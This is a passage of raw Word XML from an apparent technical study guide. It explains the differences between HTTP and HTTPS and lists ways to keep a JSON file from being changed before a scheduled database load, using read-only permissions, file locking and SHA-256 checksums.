            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="14D37849"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0FBA4AD6"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8D59DB3"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1A960303" w14:textId="77777777" w:rsidTr="00574FE8">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="17E2A7C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p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6D4C55D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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2484ED7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 Secure</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00617E2C" w:rsidRPr="00617E2C" w14:paraId="22C84EF0" w14:textId="77777777" w:rsidTr="00574FE8">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="07FE405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3FF7109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80</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="04433EA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43</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00617E2C" w:rsidRPr="00617E2C" w14:paraId="5191D753" w14:textId="77777777" w:rsidTr="00574FE8">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="79890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p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="19471BC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plain text)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5801A13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encrypted (using SSL/TLS)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00617E2C" w:rsidRPr="00617E2C" w14:paraId="6B30AFF3" w14:textId="77777777" w:rsidTr="00574FE8">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="62FE750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56DC5A4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security</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5E7FE2E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es data and ensures authenticity</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00617E2C" w:rsidRPr="00617E2C" w14:paraId="5459CFAD" w14:textId="77777777" w:rsidTr="00574FE8">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="45DAFD0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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7D29EA3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certificate</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4C0AC5F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digital certificates for validation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00617E2C" w:rsidRPr="00617E2C" w14:paraId="5256A01C" w14:textId="77777777" w:rsidTr="00574FE8">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1481011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341439C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trusted</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="06FA7B3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usted with a padlock symbol in the browser</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="604940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754C3CA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y website that handles sensitive data</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, such as login credentials, payment information, or personal details.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08C0B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commerce site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ocial media plat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 applications</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64A1D8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and other search engines also recommend HTTPS for all websites, not just those dealing with sensitive information.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FF12A1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conclusion,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3903" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="41ED76CB" w14:textId="73FD1861" w:rsidR="00B5508A" w:rsidRPr="00CE4B95" w:rsidRDefault="009F344F">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="965" w:name="_Toc197868179"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Difference between http and https</w:t>
      </w:r>
      <w:r w:rsidR="00B5508A" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="965"/>
    </w:p>
    <w:p w14:paraId="02C712CA" w14:textId="424A27E0"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main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lies in security and encryption:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A287167"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 (Hypertext Transfer Protocol):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C9358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r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: HTTP is a protocol used for transferring data over the web. It is a standard communication protocol used by browsers to retrieve information from websites.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BBFA15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 uses port 80 by default for communication.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="319EB69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 does not provide any encryption for data being transferred between the client and the server. The data is sent in plain text.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30CEB8A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HTTP is not secure and can be vulnerable to attacks like man-in-the-middle (MITM) attacks, where an attacker can intercept and manipulate the data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="058EF90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 is typically used for websites that do not involve sensitive transactions, such as blogs or informational websites.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58F4158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Hypertext Transfer Protocol Secure):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26EB8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Protocol</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: HTTPS is an extension of HTTP that adds security by using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Secure Sockets Layer/Transport Layer Security) to encrypt the communication between the client and the server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34EC24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S uses port 443 by default for secure communication.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6249978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S encrypts the data, making it unreadable to anyone who might intercept the communication. It uses SSL/TLS protocols to ensure that the data is securely transmitted.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C4743C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xml:space="preserve">: HTTPS is secure and protects against attacks like MITM. It also provides </w:t>
      </w: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xml:space="preserve"> of the server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1500F1E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S is used for websites that handle sensitive data such as online banking, e-commerce transactions, login forms, and other types of private information.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="604E04D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212"/>
        <w:gridCol w:w="5215"/>
      </w:tblGrid>
      <w:tr w:rsidR="00617E2C" w:rsidRPr="00617E2C" w14:paraId="64DAC275" w14:textId="77777777" w:rsidTr="001D4AC3">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2C1D5E1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7DB051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032B8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78D29A59" w14:textId="77777777" w:rsidTr="001D4AC3">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3762E2A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679D62C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data is in plain text</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1BE344C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SSL/TLS to encrypt data</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00617E2C" w:rsidRPr="00617E2C" w14:paraId="3A76900E" w14:textId="77777777" w:rsidTr="001D4AC3">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4278458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1B1086B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80</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="640BF9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443</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00617E2C" w:rsidRPr="00617E2C" w14:paraId="625502BE" w14:textId="77777777" w:rsidTr="001D4AC3">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="71814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formance</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="08C01A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faster due to no encryption</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4CD6AA6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encryption overhead</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00617E2C" w:rsidRPr="00617E2C" w14:paraId="75F3D15F" w14:textId="77777777" w:rsidTr="001D4AC3">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="725729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p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="14DF5A8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guarantee of data integrity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="57A1D1A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uarantees data integrity and prevents data modification</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00617E2C" w:rsidRPr="00617E2C" w14:paraId="5B36E10D" w14:textId="77777777" w:rsidTr="001D4AC3">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="25B4191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p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0932FFF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authentication</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="049174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vides authentication through SSL/TLS certificates</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00617E2C" w:rsidRPr="00617E2C" w14:paraId="1893DDA5" w14:textId="77777777" w:rsidTr="001D4AC3">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="63648A6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p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="231DC9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contribute to SEO ranking</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="48CA6BB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ranking boost for HTTPS sites</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00617E2C" w:rsidRPr="00617E2C" w14:paraId="1952343F" w14:textId="77777777" w:rsidTr="001D4AC3">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7BAACE5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62B9EF4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indication of trust</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="121DB9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dlock icon or "Secure" label in the browser</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="01AB11A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1AD1196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websites handling sensitive data like login credentials, payment details, or personal information.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62C9115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commerce, banking, and online services that require a secure environment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56AAFD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ncreasingly becoming a best practice for </w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>all</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> websites, not just those handling sensitive information, to adopt HTTPS for enhanced security and SEO benefits.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78CE57A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HTTPS is the secure version of HTTP and is essential for ensuring data privacy, security, and trustworthiness in modern web applications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B1F87F1" w14:textId="2E987AE6"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3904" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="00A3C5F5" w14:textId="2DF42849" w:rsidR="00B5508A" w:rsidRPr="00CE4B95" w:rsidRDefault="00953040">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="966" w:name="_Toc197868180"/>
      <w:r w:rsidRPr="00CE4B95">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CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="966"/>
    </w:p>
    <w:p w14:paraId="7B186D0B" w14:textId="2FA9F4F9"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ensure that </w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>no one can change the JSON file</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> after it's copied to the temp folder at 9 AM and until it's read and loaded into the database at 6 PM, you can follow these strategies:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="731C2DAA"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37ED44">
          <v:rect id="_x0000_i3905" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B10B7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Set File Permissions (Read-Only)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B5DE87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ter copying the file at 9 AM, set </w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>read-only permissions</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> on the file so no user or process can modify it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CAB49E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n Linux/Unix:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="223F4A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path/to/temp/yourfile.json</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7109EAA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444 makes the file </w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>read-only for owner, group, and others</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="247D1A5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set owner (optional):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E690C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path/to/temp/yourfile.json</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F19CB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sures only root owns the file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BAA8DF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make directory secure (optional):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="491446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555 /path/to/temp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29ECB75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writing to the directory itself (no file deletion or addition).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79420CB2"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626C3">
          <v:rect id="_x0000_i3906" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="75EDFA2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Use File Locking (Optional)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45A397B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ck the file using system utilities or programming constructs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3001368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Java</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Use FileChannel to apply a lock.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3996B9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Use fcntl module for file locking.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6668B3B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t in your case, since the write process happens only once (9 AM), setting permissions is easier and sufficient.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59C32070"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F79C">
          <v:rect id="_x0000_i3907" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DC041E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 Schedule Job with File Integrity Check (Extra Safety)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43AE07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Create a </w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>hash</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (like SHA256) of the JSON file after it's copied.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="066C24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ha256sum yourfile.json &gt; checksum.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DCA7E9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fore reading/loading at 6 PM, verify the checksum:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C6834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c checksum.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24C49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file has been tampered with, the check will fail.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="252716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CDD50">
          <v:rect id="_x0000_i3908" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="67864DF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4. Optionally Move to Secure Storage</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="266AA52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Store the file in a </w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>secured file server</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> or mount with restricted access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="644E6C2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S3 with IAM restrictions</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> if using cloud storage like AWS.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F9834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42FE09">
          <v:rect id="_x0000_i3909" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D123B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Steps:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F80A63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py file → /temp/yourfile.json at 9 AM.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45755F3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ly run:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42D3065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temp/yourfile.json</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34A7226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temp/yourfile.json</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ADEB6D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temp/yourfile.json &gt; /temp/yourfile_checksum.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D19E4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6 PM:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="056670A8"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rst verify checksum.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45FC8C29"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into DB.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0499E467" w14:textId="77777777" w:rsidR="001D4AC3" w:rsidRPr="00CE4B95" w:rsidRDefault="001D4AC3" w:rsidP="00617E2C">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1440"/>
